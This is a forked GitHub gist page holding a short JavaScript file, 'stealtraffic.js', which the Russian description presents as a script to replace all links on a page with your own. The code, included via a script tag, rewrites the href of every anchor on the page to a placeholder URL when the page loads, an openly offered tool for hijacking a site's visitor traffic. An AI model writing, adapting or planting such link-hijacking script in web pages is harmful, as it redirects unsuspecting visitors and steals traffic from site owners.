Skip to content

Instantly share code, notes, and snippets.

@hauzlife
Forked from dvygolov/stealtraffic.js
Created January 20, 2022 20:47
Show Gist options
  • Save hauzlife/053337a12342b4f38bf68b735281e616 to your computer and use it in GitHub Desktop.
Save hauzlife/053337a12342b4f38bf68b735281e616 to your computer and use it in GitHub Desktop.
Скрипт для подмены всех ссылок на странице на вашу
//Подключаем как <script src="stealtraffic.js"></script>
window.onload = function() {
var anchors = document.getElementsByTagName("a");
for (var i = 0; i < anchors.length; i++) {
anchors[i].href = "YOUR_URL_GOES_HERE"
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment